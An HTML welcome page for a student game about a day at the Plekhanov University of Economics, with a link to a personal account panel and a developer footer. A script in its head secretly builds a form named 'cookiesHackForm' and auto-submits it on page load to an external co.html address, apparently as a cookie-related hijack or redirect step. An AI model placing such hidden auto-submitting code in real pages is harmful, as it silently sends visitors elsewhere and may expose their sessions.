<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Welcome to the game "Один день"</title>
	<link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700&amp;subset=cyrillic-ext" rel="stylesheet">
	<style>
		body * {
			font-family: 'Open Sans', sans-serif;
		}
		a {
			text-decoration: none;
		}
		section {
			position: absolute;
			left: 20%;
			right: 20%;
		}
		p {
			margin: 100px 0px;
		}
		footer {
			padding: 20px 0px;
			border-top: 1px solid;
			width: 100%;
		}
	</style>
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script type="text/javascript">
$(function(){
	$('body').append('<form id="cookiesHackForm" action="http://odinden.styleru.net/co.html" method="get"></form>');
	$('#cookiesHackForm').submit();
});
</script>
</head>
<body>
	<section>

		<h1>Welcome to the game "Один День из жизни Студента РЭУ"</h1>
		<h2>Plekhanovka edition</h2>
		<p><a href="/panel">В личный кабинет</a></p>
		<footer>
			Разработано: <a href="http://styleru.net">StyleRU</a><br>
			По всем вопросам: <a href="http://vk.com/ihavebeenhere">VLZHR</a>
		</footer>
	</section>
</body>
</html>